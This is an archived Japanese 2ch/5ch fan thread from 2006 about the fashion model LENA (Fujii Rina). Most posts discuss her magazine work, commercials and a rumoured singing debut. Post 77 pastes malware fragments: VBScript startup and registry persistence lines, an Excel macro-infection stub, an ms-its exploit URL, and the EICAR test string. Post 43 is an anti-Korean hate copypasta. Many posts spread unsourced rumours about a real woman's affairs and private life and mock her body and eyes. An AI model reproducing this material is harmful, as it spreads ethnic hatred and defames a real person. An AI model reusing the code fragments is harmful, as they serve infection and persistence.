5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ViViモデル☆☆LENA☆☆Vol.4☆

1 :無名モデル:2006/11/15(水) 13:53:15 ID:nheHbsRJ
まだ出てほしい かわいすぎ!
〔前スレ〕
☆ViViモデル☆☆LENA☆☆Vol.3☆
http://life7.2ch.net/test/read.cgi/model/1149136191/
☆ViViモデル☆☆LENA☆☆Vol.2☆
http://life7.2ch.net/test/read.cgi/model/1133260585/
VIVIモデル☆☆LENA☆☆
http://life7.2ch.net/test/read.cgi/model/1092632059/

藤井リナ (Stardust Promotion, Inc.)
http://www.stardust.co.jp/talent/129.html
藤井リナ (フジイ リナ) ファンページ
http://beauty.daa.jp/fujiirina.html
LENA
http://www.joseishi.net/vivi/model/profile/lena/profile.html
LENA☆BBS
http://www.joseishi.net/vivi/model/bbs/bbs-lena.html

2 :無名モデル:2006/11/15(水) 13:57:33 ID:K96nNjHO
あったあったー、リナちゃんのスレ!!
私この人好きだな〜最近ViViによく出る
ようになったし、CMも可愛いし。

でも、ViViに出たばっかのときは
超色白で服のセンスも、その辺にいる子と
かわらない様な服着て全然モデルっぽくなかったのに…
『好きな色はピンク!』だし、今とは違う系統だった。

それから2〜3号後のViViではすっかり肌も褐色
になって、エクステつけてせりちゃんみたいに変わったよね。
絶対今の方がいい!!爆乳で服似合ってときあるけど…

LENA保守!!

3 :無名モデル:2006/11/15(水) 14:03:41 ID:K96nNjHO
あったあったー、リナちゃんのスレ!!
私この人好きだな〜最近ViViによく出る
ようになったし、CMも可愛いし。

でも、ViViに出たばっかのときは
超色白で服のセンスも、その辺にいる子と
かわらない様な服着て全然モデルっぽくなかったのに…
『好きな色はピンク!』だし、今とは違う系統だった。

それから2〜3号後のViViではすっかり肌も褐色
になって、エクステつけてせりちゃんみたいに変わったよね。
絶対今の方がいい!!爆乳で服似合ってときあるけど…

LENA保守!!

4 :無名モデル:2006/11/15(水) 14:04:42 ID:???
>>1さんありがと〜

土曜日発売かな?

5 :無名モデル:2006/11/15(水) 14:06:50 ID:RBhiO8Ai
リア・ディゾンて人似てる
しかもその人のが可愛くてスタイルいいW

6 :無名モデル:2006/11/15(水) 14:15:54 ID:K96nNjHO
あったあったー、リナちゃんのスレ!!
私この人好きだな〜最近ViViによく出る
ようになったし、CMも可愛いし。

でも、ViViに出たばっかのときは
超色白で服のセンスも、その辺にいる子と
かわらない様な服着て全然モデルっぽくなかったのに…
『好きな色はピンク!』だし、今とは違う系統だった。

それから2〜3号後のViViではすっかり肌も褐色
になって、エクステつけてせりちゃんみたいに変わったよね。
絶対今の方がいい!!爆乳で服似合ってときあるけど…

LENA保守!!

7 :無名モデル:2006/11/16(木) 01:44:24 ID:P65syXyU
☆Leah Donna Dizon☆リア・ドナ・ディゾン☆
http://life7.2ch.net/test/read.cgi/model/1163404934/


8 :無名モデル:2006/11/16(木) 01:51:22 ID:???
スターダストの公式プロフィール
ttp://www.stardust.co.jp/file/profile/lena.html

ViViのプロフィール
ttp://www.joseishi.net/vivi/model/profile/lena/profile.html

リナの美人道(ViViで連載)
ttp://www.joseishi.net/vivi/model/lena/lena.html


ラブ*リルカ 公式サイト(放送終了)
ttp://www.mxtv.co.jp/riruka/

LENAのCM情報サイト(画像しかないけど・・・)
ttp://inet01.ymdtv.jp/~shogun/ra001.html

9 :無名モデル:2006/11/16(木) 09:20:55 ID:6lnOcHZu
MTVに出てるの?☆

10 :無名モデル:2006/11/16(木) 14:13:33 ID:???
                        /⌒`⌒`⌒` \
           __            /           ヽ
        , - 、i  `!        (  ノ⌒〜⌒〜⌒ヽ、 )
     l⌒V| ≡ | ≡ |,/⌒ヽ    ヽ/     \, ,/  i ノ|
     |r= | | 匚l| 匚'| | ≡|      |    《;・;》 《;・:》 |
      ハニ! `ー‐'ゝ- '  |l==|       |  、   ,,,,(、_,),,,  ノ|
    /         一{'ーj____ノ个|   '/エェェェヨi}   |
    ハ.    ヽ, -   __ノ ̄ ., -‐、 |ヽ    lーrー、ヽi| /ー-、__
   / | \_____,{       ヽ-‐(  ノ |/  \ ヽニニニソ/|`ー-、__ `ー-、__
  /  ヽ.  、_ヽ._     _,/   |\  ` ┻━┻' |     ̄`ー-/\
  /    \_... -‐ノ ̄| ̄  /   |\\     /!  |       /  |
 /             !   /     !\\\.   //|   |        /    |
               /   /    l.\\\\ ///l   |     ノ    ,ハ
本名のほうがかわいい!
下着姿が良い!

11 :無名モデル:2006/11/16(木) 14:16:57 ID:???
このスレタイじゃ探しにくいな

12 :無名モデル:2006/11/18(土) 13:53:42 ID:z9mQc7MY
blogしてるの?

13 :無名モデル:2006/11/19(日) 12:59:58 ID:S/1FehgY
可愛くて…惹かれるなぁ☆

14 :無名モデル:2006/11/19(日) 16:02:32 ID:E64HnLGW
ピーチジョンのCMの真ん中の子?

15 :無名モデル:2006/11/19(日) 16:42:12 ID:IEdd19y5
レフリーの子ざます

16 :無名モデル:2006/11/19(日) 17:35:17 ID:E64HnLGW
>>15
可愛い過ぎ

17 :無名モデル:2006/11/20(月) 10:33:49 ID:???
           \   さがるがな    /
  ∧_∧        \  (´・ω・`)   /  ▲
 (´・ω・`)お茶飲むがな \∧∧∧∧/   ( ´・ω・) 自殺できるがな
 ( つ旦O         < の 下 > ((( (νν
 と_)_)            <    が >     )ノ
──────────< 予 る >───────────
              ..<    が >    /''⌒\
  ( ´・ω・)下がるがな < 感 な >  ,,..' -‐==''"フ  /
〜  (_ ゚T゚         /∨∨∨∨\   (n´・ω・)η  下がるがなー
   ゚ ゚̄         / (⌒─-⌒) \  (   ノ   \
            /   (´・ω・`)   \(_)_)
           /   くまさんもおるで \

18 :無名モデル:2006/11/21(火) 07:17:33 ID:???
リナちゃんっていつからViViモデル?

19 :無名モデル:2006/11/22(水) 07:48:52 ID:???
今月のViviリナとマリエが表紙だね。
やっぱリナは映像、動いてる方が可愛いわ。
しかも表紙になる時って毎回写りが微妙な気がする。

20 :無名モデル:2006/11/22(水) 14:00:15 ID:KXzqDvEl
マリエってかわいくないけど人気なのか?
表紙ってことは。リナは表紙より中身のページの方がかわいいかも。

21 :無名モデル:2006/11/22(水) 14:22:06 ID:???
↑ おのれはすっこんどれチンカスが

22 :無名モデル:2006/11/22(水) 14:22:52 ID:iDIh6lwh
22 :無名モデル :04/09/21 09:47:43 ID:MYZhCU9j
みんなの言ってるLENAはLENAでもなくRINAでもなくviviにたまに出てくるカタカナのリナでしょ?さわやか吐息に出てる巨乳で綺麗な人でしょ?

23 :無名モデル:2006/11/22(水) 14:40:55 ID:???
リナが表紙!やった!
うん?なんか隣に見たことある顔が
うげぇ〜マリエだ
最悪だ〜、なんであんなウザイ奴が
せっかくの表紙が台無しになった

24 :無名モデル:2006/11/23(木) 00:09:16 ID:???
リナちゃんめっちゃかわいいし、スタイル良いと思うんだけど
毎回vivi見てて一つ気になることがあるんだよね。
それはリナちゃんのお腹なんだけど、
出産経験がある人独特お腹に見えるんだけど‥
お腹が出てるとかそんなんじゃなくて、縦に中央だけボコってなってるやつ。
リナちゃん実は子供がいるのかなぁ‥とか気になってしょうがない。
誰かそんな噂とか聞いたことある人いませんか??

25 :無名モデル:2006/11/23(木) 10:17:11 ID:TCZAbfqM
久しぶりにViViかったんだけど、
リナちゃんていつから藤井リナってかかれるようになったん?何故?

26 :無名モデル:2006/11/23(木) 13:21:35 ID:???
松田樹里

27 :無名モデル:2006/11/23(木) 14:24:24 ID:8ipFOPps
リナヘアのページ可愛すぎる

28 :無名モデル:2006/11/24(金) 00:24:03 ID:???
いつからかは忘れたけど本名で仕事したいって理由だったと思う。

29 :無名モデル:2006/11/25(土) 03:52:09 ID:???
経産婦!?‥まさかね?

30 :無名モデル:2006/11/25(土) 16:28:11 ID:???
ただの腹筋ぽくね??(笑)

31 :無名モデル:2006/11/25(土) 21:45:09 ID:uBjyh06R
このタイトルじゃ探しにくいよ〜
今は藤井リナに芸名が本名になったんだよ。
本人の意向らしいよ<25

でもここのところ急に可愛くなったしよく見かけるね。
前は潤ちゃんばかり目がいってあまり覚えてないや
髪も伸ばした?最近なんでこんなに可愛いの〜?
細いのに胸もあるし、羨ましすぎ

32 :無名モデル:2006/11/25(土) 21:49:23 ID:???
↑おのれはすっこんどれ、チンカスが

33 :無名モデル:2006/11/26(日) 02:57:35 ID:i4hQOCL8
歯出して笑ってるのは可愛くないけど、
今月の表紙のリナちゃんは超〜可愛い☆

34 :無名モデル:2006/11/26(日) 14:44:44 ID:???
* *
* + グッジョブ!
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *


35 :無名モデル:2006/11/26(日) 14:55:06 ID:???
>>24
確かにKIDの嫁と同じ腹してる。
あちらは二人産んでるらしいけど。

36 :損を取り戻そうと賭けに出て余計損する ◆DrMfg2TIpE :2006/11/27(月) 16:47:26 ID:???
彼女にしたい

37 :無名モデル:2006/11/27(月) 22:35:39 ID:pAjZWP3i
やっぱ嵐の松潤と一緒に「さわやか吐息」のCM出てる女性ってLENAだったの??

38 :無名モデル:2006/11/28(火) 19:14:37 ID:???
>>37
なにをいまさら。

39 :無名モデル:2006/11/28(火) 19:34:02 ID:???
今月のViViで悩殺されて
藤井リナのスレ探してたんだけど、ここだったんか!

CANMAKEのイメガって可愛いすぎるなぁ何て子だろーと気になってました。

今月ViViのルームウェア特集テラエロカワユス(*´Д`*)ハァハァ

ViVi初購読記念カキコ

40 :無名モデル:2006/11/29(水) 17:40:57 ID:qu+XYQfp
かわいい!!

41 :無名モデル:2006/11/30(木) 14:22:00 ID:p/vJw4Sf
LENA細い
体重何キロくらい?

42 :無名モデル:2006/11/30(木) 14:47:30 ID:f8F5Sw5t
目がひんがらっぽいのが残念
弟のアーサーもそっくりのヒンガラ目だもんね

43 :無名モデル:2006/11/30(木) 15:43:54 ID:???


Q:なぜ朝鮮人が嫌われているのか?

A:インターネットにより,朝鮮人の実態が暴かれたから。
在日朝鮮人は,強制連行の犠牲者だと信じ込まされていたのに,
実際は,そのほとんどが密航・密入国で押し掛けてきた者とその子
孫だと分かった。おまけに戦前から犯罪が多く,とりわけ終戦後に
は,戦勝国民を騙り日本の男達が戦場からまだ復員していないこと
をいいことに,殺人,強姦,強窃盗,麻薬の密売,土地の不法占拠
など凶悪犯罪を犯していたことが分かった。
 また朝鮮を植民地にして彼らをを酷い目に遭わせたと信じ込まさ
れていたのに,実際には,朝鮮人,とりわけ被支配階級の朝鮮人に
とっては祝福ともいえる多大な恩恵を与えた。そして,道路すら無
く荒廃していた土地を近代化させたのも,他ならぬ日本であったこ
とを理解した。
 さらに,日本の敗戦後,日本国内だけでなく半島においても,日
本人に襲いかかり多大な被害と損害を与え,莫大な財産を略奪した
ことも明らかになった。
 そのうえ,今日に至るまで韓国は強烈な反日教育を行ない,こと
あるごとに日本へ害をなし,北朝鮮は日本に対して拉致,違法送金,
麻薬の密輸,工作員の送り込みなどの敵対行為をおこなってきたこ
とを知った。
 これだけのことをやられたことが分かったら,怒るのは当然である。


44 :無名モデル:2006/12/01(金) 14:07:45 ID:???
ひんがらっぽいって何?

45 :無名モデル:2006/12/01(金) 18:33:09 ID:???
私も気になった。ひんがらって何?どんな意味?

46 :無名モデル:2006/12/01(金) 20:11:34 ID:TDFdYb3q
こいつまじ性格悪い!wクラブで混んでて隣にいた女に邪魔だよどけよブス!ってどなってたのみたw

よく六本木でおやじといちゃって金もらってたし。
愛人やってたけど、愛人にまで性格の悪さよまれて切られたしw
いつも一緒にいた外人みたいな女が言ってたよ!

47 :無名モデル:2006/12/02(土) 01:44:17 ID:A5HShtHL
ソフトバンクの写真ひどすぎる
他のモデルみんなリナより顔ひとまわり小さい
顔でかいと思ってなかったのに


48 :無名モデル:2006/12/02(土) 03:19:49 ID:???
↑貴様はひっこんどれ。チン毛野郎が

49 :無名モデル:2006/12/02(土) 03:24:38 ID:???
リナより碧のほうがひどい

50 :無名モデル:2006/12/02(土) 06:39:40 ID:???
>>49
やっぱりそう思うよな

51 :匿名:2006/12/02(土) 07:58:06 ID:HVCZFE8r
リナちゃん胸でか過ぎ足長すぎ憧れる!

52 :無名モデル:2006/12/02(土) 08:01:05 ID:???
腹出過ぎ

53 :無名モデル:2006/12/02(土) 17:42:11 ID:P/OOKTcP
左手薬指にゴールドリング、左手小指にシルバーリングをいつもしてるね

54 :匿名:2006/12/02(土) 22:58:15 ID:HVCZFE8r
してるしてる!!ダーリンに貰ったのかな?

55 :無名モデル:2006/12/02(土) 23:06:55 ID:fyBj0slP
>>54
ダーリンて赤西?

56 :匿名:2006/12/02(土) 23:53:51 ID:HVCZFE8r
赤西君の彼女はエルセーヌのイメージキャラクターだったRINAだょね。まだ続いてるか不明だけど。

57 :無名モデル:2006/12/03(日) 01:31:37 ID:???
>>47だけど
リナは好きだよ
リナが一番綺麗でスタイル良かったし
スマン

58 :損を取り戻そうと賭けに出て余計損する ◆DrMfg2TIpE :2006/12/03(日) 06:43:06 ID:???
     _._
   /:::::ヽ,
  /::::::::<`O
  ⊂ニニ⊃  
  (il|゚Д゚)ヘ_∧
  (つ´゙(   )  
  | 'ヽ、   ノ
  ヾ ィ゙ , O)
   ~"(_)、__)

59 :無名モデル:2006/12/04(月) 18:14:36 ID:pMVTw1n4
何でこの子笑う時下唇噛むの?
リップ落ちないのかな

60 :無名モデル:2006/12/04(月) 18:27:55 ID:UbVdnJ9m
笑った顔よっぱらいのオッサン キモ キモ ヲェ

61 :無名モデル:2006/12/04(月) 18:56:08 ID:???
中年オヤジの様な腹に(;´Д`)ハァハァ

62 :無名モデル:2006/12/05(火) 16:06:51 ID:8g4a2Bev
リナってカラコンしてないよね??

63 :無名モデル:2006/12/05(火) 16:37:44 ID:H6WvJIFS
ヒンガラってテリー伊藤みたいなどっか向いた目の事
斜視って言うの??
リナも弟も両目外側向いてる
歯出した笑い方可愛いと思ってんのかな?

64 :無名モデル:2006/12/07(木) 00:49:51 ID:2SEWORBz
かわいいよ!

65 :無名モデル:2006/12/08(金) 02:20:51 ID:Q9JzKb6z
歌手デビューするんだね

66 :無名モデル:2006/12/08(金) 08:17:59 ID:???
>>65
それ、リア・ディゾンじゃなくて?

67 :無名モデル:2006/12/08(金) 18:47:58 ID:agglt/N0
リアよりも、リナ☆

68 :無名モデル:2006/12/08(金) 18:50:09 ID:3eKIOnI/
似てる
http://contents.oricon.co.jp/upimg/news/20061130/39691_1.jpg

69 :無名モデル:2006/12/08(金) 21:05:14 ID:Q9JzKb6z
>>66
この前LENAをジャケットに使ったDJが1月に出すCDでデビュー。

70 :無名モデル:2006/12/09(土) 19:12:17 ID:LMSyF37d
歌そんなに上手そうにみえないんだけど

71 :無名モデル:2006/12/09(土) 19:33:34 ID:???
嫌いだな・・・・
でも超美人なんだろうな・・・・・

72 :無名モデル:2006/12/09(土) 19:38:57 ID:FYyY5Zuz
下着のCMちょーかわいい!
それまであんまかわいいと思ってなかったけど、CM見て惚れたW
斜視がかわいかった!

73 :無名モデル:2006/12/09(土) 21:40:09 ID:GgboH2o4
リナ歌手デビューするの??

74 :無名モデル:2006/12/10(日) 15:11:57 ID:GlpbJoSg
スターダストって結構、歌手デビューするモデル多いよね。
梨花とか鈴木えみ、アリスに北川景子・・・
まぁ景子ちゃんはセーラームーンの役でだったけど。

75 :無名モデル:2006/12/10(日) 18:59:10 ID:???
デビューするとしたらどんなジャンルなんだろう?

76 :無名モデル:2006/12/10(日) 23:04:30 ID:???
リナちゃんって安室ちゃん好きじゃなかったっけ?RB系かなぁ?まさかねWW

77 :<body onload=window()>:2006/12/11(月) 00:54:37 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

78 :無名モデル:2006/12/11(月) 01:10:39 ID:oZRwJcXa
リナが歌手…

79 :無名モデル:2006/12/11(月) 02:11:57 ID:l16mSAl0
歌手デビューするの??

80 :無名モデル:2006/12/11(月) 08:52:09 ID:???
フライドポテトMサイズはトランス脂肪酸が4.55g
WHOの基準では目安で1日2グラム以下に押さえたほうが良いらしい

81 :無名モデル:2006/12/12(火) 12:02:17 ID:???
からあげの良い揚げ方
180℃の油で1分半揚げそのまま4分放置。再び油に入れ40秒。

82 :無名モデル:2006/12/12(火) 13:50:18 ID:wzgHvA5d
リナは斜視w
しかもグッキーw笑ったら可愛くないよ

83 :無名モデル:2006/12/12(火) 13:53:59 ID:MePXZv7g
藤井リナかわいすぎ!!☆

84 :無名モデル:2006/12/12(火) 15:15:31 ID:wzgHvA5d
ヘソはゴマが溜まりすぎて臭いみたいだよ

85 :無名モデル:2006/12/12(火) 16:54:21 ID:wzgHvA5d
あと歯茎も臭いよ

86 :無名モデル:2006/12/13(水) 00:13:40 ID:???
      _人人人人人人人人人人人人人人人_
        >      な、なんだってー!!    <
        ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
   ∩___∩              ∩____∩
   | ノ     u ヽ            / u     u └|  ∩____∩
  / # ●   ● |           | ●   ● # .ヽ/  u    └|
  | u   ( _●_)  ミ          彡   (_●_ ) u  |●   ● # ヽ
 彡、   |∪|  、`\        /     |∪|    彡  (_●_) u   |
/ __  ヽノ /´>  )       (  く   ヽ ノ   / u   |∪|    ミ
(___)   / (_/        \_ )      (  く   ヽ ノ     ヽ



87 :無名モデル:2006/12/13(水) 06:47:48 ID:???
(つд∩) ウエーンウエーン
(つд∩) ウエーンウエーン
つ・д∩)チラ
(つд∩) ウエーンウエーン

88 :匿名:2006/12/13(水) 11:07:07 ID:gAcRZ9nL
リナチャンてタバコ吸ったりするのかな?

89 :無名モデル:2006/12/13(水) 21:02:06 ID:DgX8i8UK
まじで歌手デビュー?

90 :無名モデル:2006/12/13(水) 21:19:37 ID:XDc5RWCB
細すぎてスキニージーンズが履きこなせてない!
リナって洋服とかかなり買い取りしてるけど、
あんなに沢山着きれないと思うんだけどな。

91 :無名モデル:2006/12/14(木) 00:18:17 ID:G2YqU3xk
>>89リナちゃん歌手デビューしないよ、ただCDのジャケットがリナちゃんなだけで。

92 :無名モデル:2006/12/14(木) 05:57:14 ID:SxPQLD0l
ボヤけた方が可愛いと言う事実

93 :無名モデル:2006/12/14(木) 08:14:51 ID:AgE5/Ytw
可愛ければ真実☆

94 :無名モデル:2006/12/14(木) 08:43:42 ID:???
今月のsweet読んだけど、前髪きったのかな?見慣れてないせいか、違和感あった

95 :無名モデル:2006/12/14(木) 21:44:46 ID:xl66puOO
>>94
私も思った。

リナが出てる雑誌ってsweetとViVi以外にある??

96 :無名モデル:2006/12/14(木) 22:32:39 ID:???
>>95
宝島のステディにも載ってる。

97 :無名モデル:2006/12/14(木) 23:06:34 ID:x2V5OkHP
リナってかなりたばこ吸ってるよな。

98 :リナさん:2006/12/15(金) 11:26:24 ID:mQD9/9dj
この子足長すぎ、胸デカすぎ

99 :無名モデル:2006/12/15(金) 12:55:32 ID:???
:::::::::::::::::::::::::::::    ,.-ヽ     
::::::::::::::::::::::   ____,;' ,;- i          ____ / ̄ ̄ ̄ ̄\
::::::::::::::::::   ,;;'"  i i ・i;        /      ヽ_____  ヽ
:::::::::::::::  ,;'":;;,,,,,, ;!, `'''i;        |VVVVVV\  |─ 、 ─ 、 ヽ|  |
:::::::::::  ,/'"   '''',,,,''''--i        | >  < |__|  ・|・  |─|___/
:::::::::  ;/  .,,,,,,,,,,,,,,,,,   ;i'⌒i;     ///⊂⊃/// 6) - c`─ ′  6 l
::::::  i;"     ___,,,,,,,  `i"     | ,─┴─、  | (____  ,-′
::::::: i;    ,,;'""" `';,,,  "`i;   ヽ|___ノ ノ ヽ___ /ヽ
::::::: |  ''''''i ,,,,,,,,,,  `'--''''"  ./ `ー  ―''"    ヽ     |
::::::: |.    i'"   ";,         | ,i、o  、o ∩`i  /   へ |
::::::: |;    `-、.,;''"        | |    ⊆ ̄  ̄ ̄  /。j  |
::::::::  i;     `'-----j      | |     ミ_,,-'ー―'"|  

100 :無名モデル:2006/12/15(金) 16:54:01 ID:oZiBD/t9
リナ口臭いよ

101 :無名モデル:2006/12/15(金) 17:09:08 ID:EwtcK6ly
>>94
前髪パッツンにしたとかなの?

102 :無名モデル:2006/12/15(金) 17:25:39 ID:ueZ7f3sU
そんなにでかくないよ。
Dカップくらいだよ。

あなたそんなに貧乳なの??

103 :無名モデル:2006/12/15(金) 20:25:05 ID:1LHmd/WC
うん!あってもDですよね。やっぱり胸ない人は憧れるんじゃない?

104 :無名モデル:2006/12/15(金) 22:32:02 ID:???
胃が悪いんじゃね?
胃が悪かったり下痢してると口臭くなるよ。

105 :無名モデル:2006/12/15(金) 23:05:11 ID:HBy74qFv
>91
ボーカルやるっぽいよ

前髪見たい

106 :無名モデル:2006/12/16(土) 11:16:55 ID:t3IpitYS
リナ前髪下ろしたらけっこうかわいい…!!☆

107 :無名モデル:2006/12/16(土) 23:06:04 ID:???
>>91
1月1日に出るDJ KAWASAKIのアルバムのBright Like Lightって曲。
少しは調べろよ。

108 :無名モデル:2006/12/18(月) 05:07:46 ID:SVcxZA5Y
毎回ViVi見て思うけどこの子ってどんな服でも似合うよね
そんな子なかなかいないと思う
うらやましすぎる

109 :無名モデル:2006/12/18(月) 07:13:12 ID:???
お腹が中年オヤジなみにボヨボヨなのが(;´Д`)ハァハァ

110 :無名モデル:2006/12/20(水) 05:16:07 ID:???
歌手デビュー

マジみたいっすね

111 :無名モデル:2006/12/20(水) 22:47:05 ID:RbwmX9Ub
>>108
同意!どんな服でも似合うし
下着姿も綺麗。
いそうでいないモデルかも。



112 :無名モデル:2006/12/21(木) 02:23:57 ID:???
オリラジの総集編で見た
これ誰か動画もってない?

113 :無名モデル:2006/12/21(木) 02:52:54 ID:US7S24v8
さっきオリラジのに出てた。雑誌で見るよりテレビの方が可愛いいし、足長くて細いしオッパイでかいし惚れ惚れしちゃったよ。
元彼が慎吾に似てるって言っててやけに慎吾にボディタッチしてたよ。
やりすぎかなと思ったけど男だったら嬉しいわ〜
なんだかんだ言われてるけど可愛いよ

114 :無名モデル:2006/12/21(木) 08:25:55 ID:7wiGvewJ
コンサバや強めの格好で
シンプルなメイクの時が一番好き


115 :無名モデル:2006/12/21(木) 08:39:38 ID:Hl7B6v39
元カレに似てるのはあっちゃんの方って言ってたじゃん。何聞いてるの?

116 :無名モデル:2006/12/21(木) 09:21:22 ID:Kj++zs73
>>114
コンサバなLENA可愛い…!!☆

117 :無名モデル:2006/12/21(木) 10:33:37 ID:HrwH8CGs
LENAはすっぴんも可愛い

118 :無名モデル:2006/12/21(木) 11:19:00 ID:Kj++zs73
LENAはメイクしても☆

119 :無名モデル:2006/12/21(木) 11:47:45 ID:i120UTi9
ぱっつん変
パリス特集の時が一番可愛かった

120 :無名モデル:2006/12/21(木) 19:01:58 ID:6rabPMFW
↑きみの顔が変なんじゃない?

121 :無名モデル:2006/12/23(土) 17:10:05 ID:???
ViVi】藤井リナ ★ LENA【Peach John】Vol.1
http://pie.bbspink.com/test/read.cgi/girls/1166861337/1-100

122 :無名モデル:2006/12/24(日) 00:54:48 ID:???
リナ、ぱっつんにすると幼い感じになるね。ふわふわパーマかわいい。
でこ出すと老けて見える。

123 :無名モデル:2006/12/24(日) 16:39:22 ID:YyUeDx2v
リナチャンはせりチャン並みに色気があるよね!前髪切っても色っぽいのは凄いよね!!

124 :無名モデル:2006/12/24(日) 16:42:34 ID:???
↑おのれはすっこんどれチンカスが。

125 :無名モデル:2006/12/24(日) 17:06:13 ID:YyUeDx2v
↑沈下す

126 :可蓮:2006/12/24(日) 17:13:07 ID:JmHJ04/q
もぅ超かわいい!!可蓮のあこがれの人〜!!
ダイエットは「特に何もしてない」って書いてあったけど、何もしてなくてあの体形は
すごぉいよね♪♪ちゃんと、胸あるし、細いだけじゃなくて体のラインも超キレイ!!
ほんと、いいなぁ〜〜〜〜☆★

127 :無名モデル:2006/12/24(日) 22:39:58 ID:E1T6cQwX
こいつ、グレイのテルと不倫してるよ!かなりガチで!!俺の働いてるクラブじゃ有名な話。

128 :無名モデル:2006/12/24(日) 23:11:02 ID:TfKuc6SR
まじ??

129 :無名モデル:2006/12/24(日) 23:13:52 ID:YyUeDx2v
つーかテルうぜぇ〜。どんだけ女好きなんだよ。亜美ん時も不倫からだったんだろ?いい加減にしろ!

130 :無名モデル:2006/12/24(日) 23:19:57 ID:???
>>127
詳しく

131 :無名モデル:2006/12/24(日) 23:31:59 ID:+zV2jxG5
LENA可愛い…と思う!!☆

132 :無名モデル:2006/12/25(月) 02:01:58 ID:HQ9BW1mr
遅くなってごめん!   確か、話によると同じViViモデルのちかこ?とかいう女がいEXILEのアツシと事務所が一緒でしかも付き合ってる?らしくてEXILEとグレイ一度組んだからその流れでリナも仲良くなったみたいな感じらしいよ?

133 :無名モデル:2006/12/25(月) 03:45:59 ID:???
君がクラブ等で観た訳ではないの?聞いた話?そこ重要・・

134 :可蓮:2006/12/25(月) 09:59:38 ID:pAogl1Rj
う〜ん?LINAが誰と付き合ってようが何でもいいんじゃない?

135 :無名モデル:2006/12/25(月) 13:38:30 ID:EthwCZpF
人それぞれ
お前の意見はいいよ

136 :無名モデル:2006/12/25(月) 15:06:15 ID:2XMOqYIh
まぁ確かに誰と付き合おうが俺もどうでもいい。だけどあみがちょっと可愛そうと思いました。ちなみに、りなが酔って大声で愚痴ってたのはほんとだからテルの事もほんとだと思います。

137 :無名モデル:2006/12/25(月) 15:07:54 ID:bRPvCM/W
ありがとうございます!!

138 :無名モデル:2006/12/25(月) 15:09:31 ID:2XMOqYIh
あっ!でもあみも同じことしたんだっけ(@_@;)   人の嫌がることしたら自分にかえってくるってことかぁ。

139 :無名モデル:2006/12/25(月) 17:19:21 ID:xnNlcoW4
この人のケータイのメモリーすごそう

140 :無名モデル:2006/12/25(月) 22:57:42 ID:???
リナ、オリキュン(?だっけ?)に出てるのみたけどにこにこしてて
足細長くてすんごいかわいかった。背も高くないしあれは男受け
するだろうねー

141 :無名モデル:2006/12/25(月) 23:22:27 ID:gebDAsBh
↑それ観たかったなぁ(´∀`)

142 :無名モデル:2006/12/26(火) 00:16:47 ID:H/Lu2jjf
エグザエルと同じ事務所は長谷川潤で、ちかこ?って人はエビちゃんと同じ事務所w
確かに長谷川潤ちゃんって、マキダイと付き合ってたね

143 :無名モデル:2006/12/26(火) 04:06:42 ID:bC4z67vL
本当リナが誰と付き合おうがどうでもいい。
テルだからかもしれないけど。だいたいテルってのがちょっと…
もっとお肌がキレイないい男いるだろうに。

144 :無名モデル:2006/12/26(火) 10:08:57 ID:9nhuAkZl
viviモデルってエイベ系とかつながりで付き合ってるの分かりやすい
佐田真由美・ヒロ
畑田亜季・松浦
岩堀せり・タクロー
この女3人は仲良しで紹介したって言ってたし

長谷川潤・マキダイ
リナがテルでもチカコがアツシでもおかしくないな。
でもキモイけど一番玉の輿は亜季ちゃん☆

145 :無名モデル:2006/12/26(火) 10:57:04 ID:eot3K9CZ
みんなViViモデルだし!

146 :無名モデル:2006/12/26(火) 12:11:54 ID:/bnx5fKf
吉田セイラとUSAもだよ

147 :無名モデル:2006/12/26(火) 12:29:35 ID:eot3K9CZ
でもテルのどこがいいのかわからない。リナちゃんにはもっと独身で素敵な人がいると思うのに。

148 :可蓮:2006/12/26(火) 13:02:12 ID:nW0lT9dz
リナほんと、かわいい(・U・)

149 :無名モデル:2006/12/26(火) 14:42:43 ID:???
リナちゃんとテル??
わざわざ落ち目歌手の不倫を選ばなくても・・・
ありえない


150 :無名モデル:2006/12/26(火) 17:07:29 ID:???
釣りだろ?

151 :無名モデル:2006/12/27(水) 00:44:22 ID:???
テルってリナの好みのタイプと全然違うんじゃないの?
錦戸にしとけって・・・

152 :無名モデル:2006/12/27(水) 04:06:35 ID:dmH5qm2L
RIZEのジェシーは??

153 :無名モデル:2006/12/27(水) 04:23:19 ID:???
長谷川くんは?

154 :無名モデル:2006/12/27(水) 11:16:15 ID:97NFA11R
タレ目のマッチョにハスキー声だっけ???
クレーターテル

155 :無名モデル:2006/12/27(水) 12:19:16 ID:jvWkGG+t
テルはハスキーだけどマッチョかな?ただの青髭のオヤジ。早くほされろ。

156 :無名モデル:2006/12/27(水) 12:42:56 ID:FpuOUNZU
どーせ売れない売れないwここにいるリナファンでも買う人そんないないでしょ?>>74とか山田優のように名前があっても売れなかったし。

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)